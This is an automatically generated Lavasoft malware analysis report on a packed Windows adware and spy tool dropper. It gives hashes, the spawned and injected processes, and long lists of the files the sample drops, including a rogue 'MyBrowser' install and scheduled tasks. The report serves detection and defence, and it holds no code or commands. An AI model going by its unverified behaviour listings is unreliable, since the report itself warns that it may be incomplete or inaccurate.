not-a-virus:HEUR:AdWare.Win32.ConvertAd.heur (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, SpyTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6014e42e22c25611cc80146e840cbe2b
SHA1: 824bdff141a0f1ef1e88e90e2231edf7d5582de9
SHA256: d3427777a18e716497d0695e25f13b2aae15f5e6736f8b9843dec4b327fbaded
SSDeep: 6144:Ke34QYfvbUeqJPShu jeF9sMkL75 ZPPfnE2Qyn2FEtt2NB6 sf:ZYfyUh/a vLF ZPPfnEUnsEWfXsf
Size: 307583 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
upgmsd_re_005010096.exe:1276
nsf2B.tmp:1664
nsf2B.tmp:668
nswA.tmp:1336
gmsd_re_005010096.exe:592
nsr19.tmp:204
nsdF.tmp:1060
fsd34.exe:1692
nsw42.tmp:660
setup.exe:1356
taskkill.exe:1804
taskkill.exe:1796
taskkill.exe:660
nsj32.tmp:1912
amisid.exe:1952
amisid.exe:1844
tasklist.exe:1852
tasklist.exe:324
nss12.tmp:1616
9823.exe:320
nsx36.tmp:1468
encrypt.exe:1060
encrypt.exe:1476
encrypt.exe:1100
encrypt.exe:1584
nsx1C.tmp:1896
nsx1C.tmp:1088
nst25.tmp:1804
nsk6.tmp:204
%original file name%.exe:1736
The SpyTool injects its code into the following process(es):
nsx46.tmp:2724
nso3D.tmp:3724
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process upgmsd_re_005010096.exe:1276 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
The process nsf2B.tmp:1664 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-UGOR9.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-9SIQI.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-LKR89.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\is-FEB6H.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-L9FO9.tmp (8657 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-P9554.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (15278 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (0 bytes)
The process nsf2B.tmp:668 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (3781 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp (0 bytes)
The process nswA.tmp:1336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsnC.tmp (0 bytes)
The process gmsd_re_005010096.exe:592 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
The process nsr19.tmp:204 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1C.tmp (7288 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp (0 bytes)
The process nsdF.tmp:1060 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\9823.exe (14988 bytes)
The process fsd34.exe:1692 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
The process nsw42.tmp:660 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc44.tmp (0 bytes)
The process nsx46.tmp:2724 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst49.tmp (19514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\UserInfo.dll (4 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\System.dll (11 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\AnyProtectEx\installer\tempfile.t (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp (0 bytes)
The process setup.exe:1356 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\chrome.7z (1161171 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
The SpyTool deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574 (0 bytes)
The process nsj32.tmp:1912 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\FinalInstaller_dotnet4[1].exe (1479345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
The process nss12.tmp:1616 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (0 bytes)
The process 9823.exe:320 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\netflix.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (1644 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail.ru.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail_live_msn.ico (1592 bytes)
